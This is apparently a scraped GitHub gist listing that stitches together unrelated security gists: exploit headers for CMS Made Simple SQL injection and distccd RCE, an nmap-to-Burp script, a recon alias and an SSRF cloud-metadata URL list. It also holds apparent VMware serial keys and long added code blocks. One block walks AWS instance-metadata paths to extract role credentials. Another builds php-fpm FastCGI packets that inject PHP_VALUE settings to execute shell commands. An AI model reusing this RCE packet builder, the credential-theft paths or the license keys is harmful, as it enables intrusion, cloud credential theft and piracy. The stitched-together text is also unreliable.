Mahendra Thanniru (Mah1ndra)
Remote
@clubby789
clubby789 / fastcgi-gen.py
Created July 29, 2020 01:29
A Python script to generate FastCGI packets to be injected into a php-fpm socket. Based on https://gist.github.com/wofeiwo/4f41381a388accbf91f8
#!/usr/bin/python3
# Ported to Python from https://gist.github.com/wofeiwo/4f41381a388accbf91f8
# Only implements packet generation, not sending/receiving
import base64

class FCGIClient:
    def __init__(self):
        # FastCGI protocol constants (record types and version)
        self.VERSION_1 = 1
        self.BEGIN_REQUEST = 1
        self.ABORT_REQUEST = 2
        self.END_REQUEST = 3

#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
@ZEROF
ZEROF / Fixing VMWARE Workstation 15.5.x kernel 5.4 modules issue.md
Created December 15, 2019 13:15
Fixing VMWARE Workstation 15.5.x kernel 5.4 modules issue

Hi folks,

For some time now there has been an issue for everyone running VMware Workstation (I think even Player) with the vmmon and vmnet kernel modules. When you start Workstation you get the message "Before you can run VMware, several modules must be compiled and loaded into the running kernel". You try to click on Install, but in the end you get an error message with the path to an error log file.

VMware-Kernel-Module-Updater

I'm running kernel 5.4 because this version fixes a few hardware issues I have with "modern hardware" on my laptop.

@DarkCoderSc
DarkCoderSc / distccd_rce_CVE-2004-2687.py
Last active January 26, 2024 09:22
(CVE-2004-2687) DistCC Daemon - Command Execution (Python)
# -*- coding: utf-8 -*-
'''
distccd v1 RCE (CVE-2004-2687)
This exploit is ported from a public Metasploit exploit code :
https://www.exploit-db.com/exploits/9915
The goal of that script is to avoid using Metasploit and to do it manually. (OSCP style)
Serial Keys:
FU512-2DG1H-M85QZ-U7Z5T-PY8ZD
CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD
GV7N2-DQZ00-4897Y-27ZNX-NV0TD
YZ718-4REEQ-08DHQ-JNYQC-ZQRD0
GZ3N0-6CX0L-H80UP-FPM59-NKAD4
YY31H-6EYEJ-480VZ-VXXZC-QF2E0
ZG51K-25FE1-H81ZP-95XGT-WV2C0
VG30H-2AX11-H88FQ-CQXGZ-M6AY4
@jgamblin
jgamblin / nmapburp.sh
Created September 6, 2018 19:49
NMap a network and send all open web servers to Burp.
#!/bin/bash
# Scan a network for hosts with 443/tcp open and hand each one to Burp's REST API (POST /v0.1/scan).
# -p 443 selects the port (a bare "443" would be parsed by nmap as a target), --open keeps only open ports,
# -oG - writes grepable output so awk can pick the address from every "Host:" line that contains "open".
sites=$(nmap "$1" -p 443 --open --resolve-all -oG - | awk 'NR!=1 && /open/{print $2}')
for site in $sites
do
# Burp expects full URLs, so prefix the scheme that matches the scanned port.
curl -vgw "\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["https://'"$site"'"]}' > /dev/null 2>&1
printf "Scanning %s with burp.\n" "$site"
done
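The gist above only handles port 443 and assumes the address alone is a usable URL. As an added example (not jgamblin's code), here is the same pipeline generalized in Python: it parses nmap's grepable (-oG) output, keeps every open TCP port whose service looks like HTTP, picks the scheme from the service name or port, and builds the JSON body the gist posts to Burp's REST API. The nmap output embedded below is constructed, and submit_to_burp is only defined, not called, so the script runs offline.

```python
import json
import re
import urllib.request

# Constructed nmap -oG output in the same shape the gist pipes through awk.
SAMPLE_GREPABLE = """# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -p 80,443,8080,8443 --open -oG - 192.0.2.0/28
Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///\tIgnored State: closed (997)
Host: 192.0.2.11 (web.example.test)\tPorts: 8080/open/tcp//http-proxy///, 8443/closed/tcp//https-alt///
# Nmap done at Mon Jan  1 00:00:05 2024 -- 16 IP addresses (2 hosts up) scanned in 5.00 seconds
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)")
TLS_PORTS = {443, 8443}  # treat these as TLS even when the service name is ambiguous


def parse_grepable(text: str):
    """Yield (address, hostname, port, service) for every open TCP port in nmap -oG output."""
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")  # grepable fields are tab separated
        m = HOST_RE.match(fields[0])
        if not m:
            continue
        address, hostname = m.group(1), m.group(2)
        ports_field = next((f for f in fields if f.startswith("Ports:")), None)
        if ports_field is None:
            continue  # "Status: Up" lines carry no port list
        for entry in ports_field[len("Ports:"):].split(","):
            # each entry is port/state/protocol/owner/service/rpcinfo/version/
            parts = entry.strip().split("/")
            if len(parts) < 5:
                continue
            port, state, proto, service = int(parts[0]), parts[1], parts[2], parts[4]
            if state == "open" and proto == "tcp":
                yield address, hostname, port, service


def web_urls(text: str) -> list:
    """Turn open web ports into URLs Burp can scan; scheme from service/port, host from the resolved name if any."""
    urls = []
    for address, hostname, port, service in parse_grepable(text):
        if "http" not in service:
            continue
        tls = service.startswith("https") or service.startswith("ssl/") or port in TLS_PORTS
        scheme = "https" if tls else "http"
        host = hostname or address
        default_port = 443 if tls else 80
        urls.append(f"{scheme}://{host}" if port == default_port else f"{scheme}://{host}:{port}")
    return urls


def burp_scan_body(urls: list) -> str:
    """JSON body for POST /v0.1/scan on Burp's REST API, the same shape the gist sends with curl."""
    return json.dumps({"urls": urls})


def submit_to_burp(urls: list, api: str = "http://127.0.0.1:1337/v0.1/scan") -> int:
    """Submit one scan task covering all URLs and return the HTTP status code. Needs a running Burp; not called here."""
    req = urllib.request.Request(
        api,
        data=burp_scan_body(urls).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


if __name__ == "__main__":
    print(burp_scan_body(web_urls(SAMPLE_GREPABLE)))
```

Run nmap with -sV if you want the service column to reflect what actually answers rather than the nmap-services default for the port; the scheme guess above is only as good as that column.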
@rootxharsh
rootxharsh / reconme.txt
Last active February 27, 2020 16:27
Aquatone and gowitness
alias reconme='function frecon()
{
mkdir $1
$HOME/./gowitness --chrome-path=/usr/bin/google-chrome file --source=$HOME/aquatone/$1/urls.txt -d $1/ -$
$HOME/./gowitness --chrome-path=/usr/bin/google-chrome -D /var/www/html/recon/$1/.gowitness-$1.db gene$
mv report.html $1/report-$1.html
sed -i -e 's%var\/www\/html\/%%g' $1/report-$1.html
chown -R www-data:www-data /var/www/html/recon
touch /var/www/html/recon/$1/index.html
@jhaddix
jhaddix / cloud_metadata.txt
Last active April 30, 2024 09:38 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
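The AWS paths above are plain IMDSv1 GETs, which is exactly what a GET-only SSRF can reach. As an added example (not part of jhaddix's dictionary), the code below walks the credential path through an injected transport: it tries IMDSv1, falls back to the IMDSv2 handshake (PUT /latest/api/token with a TTL header, then GET with X-aws-ec2-metadata-token) when the service answers 401, and shows why a GET-only SSRF stops working once IMDSv2 is enforced. FakeIMDS, its role name, token and credential document are all constructed so the flow runs offline.

```python
import json

IMDS = "http://169.254.169.254"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"
TOKEN_PATH = "/latest/api/token"
TOKEN_TTL_HEADER = "X-aws-ec2-metadata-token-ttl-seconds"
TOKEN_HEADER = "X-aws-ec2-metadata-token"


def fetch_role_credentials(http):
    """Retrieve instance-role credentials via http(method, url, headers) -> (status, body).

    IMDSv1 first (bare GET). A 401 means HttpTokens=required, so switch to IMDSv2:
    PUT a session token and repeat the GETs with the token header.
    Returns None when this transport cannot reach credentials.
    """
    token = None
    status, body = http("GET", IMDS + CREDS_PATH, {})
    if status == 401:
        status, token = http("PUT", IMDS + TOKEN_PATH, {TOKEN_TTL_HEADER: "21600"})
        if status != 200:
            return None
        status, body = http("GET", IMDS + CREDS_PATH, {TOKEN_HEADER: token})
    if status != 200 or not body.strip():
        return None
    role = body.splitlines()[0]  # the listing endpoint returns one role name per line
    headers = {TOKEN_HEADER: token} if token else {}
    status, doc = http("GET", IMDS + CREDS_PATH + role, headers)
    if status != 200:
        return None
    creds = json.loads(doc)
    return {
        "imds_version": 2 if token else 1,
        "role": role,
        "access_key_id": creds["AccessKeyId"],
        "secret_access_key": creds["SecretAccessKey"],
        "session_token": creds["Token"],
        "expiration": creds["Expiration"],
    }


class FakeIMDS:
    """Constructed stand-in for 169.254.169.254. require_token=True models HttpTokens=required (IMDSv2 only)."""

    TOKEN = "AQAAAconstructed-session-token"
    ROLE = "web-instance-role"
    DOC = json.dumps({
        "Code": "Success", "LastUpdated": "2024-01-01T00:00:00Z", "Type": "AWS-HMAC",
        "AccessKeyId": "ASIACONSTRUCTEDEXAMPLE",
        "SecretAccessKey": "constructed/secret/EXAMPLEKEY",
        "Token": "constructed-session-token",
        "Expiration": "2024-01-01T06:00:00Z",
    })

    def __init__(self, require_token: bool):
        self.require_token = require_token

    def __call__(self, method, url, headers):
        path = url[len(IMDS):]
        if method == "PUT" and path == TOKEN_PATH:
            return (200, self.TOKEN) if TOKEN_TTL_HEADER in headers else (400, "")
        if method != "GET":
            return 405, ""
        if self.require_token and headers.get(TOKEN_HEADER) != self.TOKEN:
            return 401, ""  # real IMDS answers 401 to token-less GETs when v2 is enforced
        if path == CREDS_PATH:
            return 200, self.ROLE + "\n"
        if path == CREDS_PATH + self.ROLE:
            return 200, self.DOC
        return 404, ""


def get_only(http):
    """Model a typical SSRF primitive: the victim issues GETs and the attacker controls neither method nor headers."""
    def transport(method, url, headers):
        if method != "GET":
            return 405, ""
        return http("GET", url, {})
    return transport


if __name__ == "__main__":
    print(fetch_role_credentials(FakeIMDS(require_token=False)))
    print(fetch_role_credentials(FakeIMDS(require_token=True)))
    print(fetch_role_credentials(get_only(FakeIMDS(require_token=True))))
```

Two practical consequences follow: an SSRF that only lets you choose a URL retrieves IMDSv1 credentials but fails against IMDSv2, and even with method and header control the IMDSv2 token response is sent with an IP TTL of 1 by default, so a hop through a container or proxy on the instance drops it.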
@wofeiwo
wofeiwo / fcgi_jailbreak.php
Created September 29, 2015 05:04
Jail break for PHP 5.3.3+ FASTCGI
<?php
/**
* PHP 5.3.3+ FASTCGI jailbreak
*
* @author wofeiwo <wofeiwo#80sec.com>
* @date 2013-01-23
* @version 1.0
* @reference https://bugs.php.net/bug.php?id=64103
* @reference http://www.wooyun.org/bugs/wooyun-2013-018116 (Chinese)
* @note disables PHP security settings, but can't override disable_functions/disable_classes.
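Both FastCGI gists on this page (clubby789's packet generator near the top and wofeiwo's jailbreak here) depend on hand-built FastCGI records that carry PHP_VALUE and PHP_ADMIN_VALUE parameters to php-fpm. The following is an added example, not code from either gist: it encodes the record header and the name-value length format, assembles the BEGIN_REQUEST / PARAMS / STDIN sequence php-fpm expects for one request, and parses the bytes back so the framing can be checked. The script path and PHP payload are constructed; nothing is written to a socket.

```python
import struct

# FastCGI constants from the protocol spec (the same values the gist's FCGIClient defines).
FCGI_VERSION_1 = 1
FCGI_BEGIN_REQUEST = 1
FCGI_PARAMS = 4
FCGI_STDIN = 5
FCGI_RESPONDER = 1


def fcgi_record(rec_type: int, content: bytes, request_id: int = 1) -> bytes:
    """Wrap content in one record: 8-byte header, content, zero padding up to a multiple of 8."""
    if len(content) > 0xFFFF:
        raise ValueError("record content exceeds 65535 bytes; split it across records")
    padding = (-len(content)) % 8
    # version, type, requestId (BE16), contentLength (BE16), paddingLength, reserved
    header = struct.pack("!BBHHBx", FCGI_VERSION_1, rec_type, request_id, len(content), padding)
    return header + content + b"\x00" * padding


def encode_length(n: int) -> bytes:
    """Name-value length: one byte below 128, otherwise four bytes big-endian with the top bit set."""
    if n < 0x80:
        return bytes([n])
    return struct.pack("!I", n | 0x80000000)


def encode_params(params: dict) -> bytes:
    """Serialize a dict into FCGI_PARAMS name-value pairs."""
    out = bytearray()
    for name, value in params.items():
        n, v = name.encode(), value.encode()
        out += encode_length(len(n)) + encode_length(len(v)) + n + v
    return bytes(out)


def build_php_fpm_request(script_filename: str, php_code: str, request_id: int = 1) -> bytes:
    """Record sequence for one php-fpm request carrying the wofeiwo PHP_VALUE trick.

    auto_prepend_file=php://input makes php-fpm execute the request body before the
    target script, and PHP_ADMIN_VALUE turns on allow_url_include so php:// wrappers
    are allowed there. script_filename must be a PHP file that exists on the target.
    """
    body = php_code.encode()
    script_name = "/" + script_filename.rsplit("/", 1)[-1]
    params = {
        "GATEWAY_INTERFACE": "FastCGI/1.0",
        "REQUEST_METHOD": "POST",
        "SCRIPT_FILENAME": script_filename,
        "SCRIPT_NAME": script_name,
        "REQUEST_URI": script_name,
        "SERVER_SOFTWARE": "php/fcgiclient",
        "REMOTE_ADDR": "127.0.0.1",
        "SERVER_PROTOCOL": "HTTP/1.1",
        "CONTENT_TYPE": "application/x-www-form-urlencoded",
        "CONTENT_LENGTH": str(len(body)),
        "PHP_VALUE": "auto_prepend_file = php://input",
        "PHP_ADMIN_VALUE": "allow_url_include = On",
    }
    begin = struct.pack("!HB5x", FCGI_RESPONDER, 0)  # role, flags (no keep-conn), reserved
    return (
        fcgi_record(FCGI_BEGIN_REQUEST, begin, request_id)
        + fcgi_record(FCGI_PARAMS, encode_params(params), request_id)
        + fcgi_record(FCGI_PARAMS, b"", request_id)  # empty PARAMS record ends the parameter list
        + fcgi_record(FCGI_STDIN, body, request_id)
        + fcgi_record(FCGI_STDIN, b"", request_id)  # empty STDIN record ends the body
    )


def parse_records(data: bytes) -> list:
    """Walk a byte stream of FastCGI records; returns (type, request_id, content) tuples."""
    records, offset = [], 0
    while offset < len(data):
        version, rec_type, request_id, length, padding = struct.unpack_from("!BBHHBx", data, offset)
        if version != FCGI_VERSION_1:
            raise ValueError("unknown FastCGI version %d" % version)
        offset += 8
        records.append((rec_type, request_id, data[offset:offset + length]))
        offset += length + padding
    return records


if __name__ == "__main__":
    # Constructed target path and payload; the bytes are only printed, never sent.
    payload = build_php_fpm_request("/var/www/html/index.php", "<?php echo shell_exec('id'); ?>")
    for rec_type, rid, content in parse_records(payload):
        print(rec_type, rid, len(content), content[:40])
```

The parser is the useful check: if a hand-rolled packet is off by a byte in contentLength or paddingLength, php-fpm silently closes the socket, and round-tripping the buffer through parse_records catches that before anything is sent.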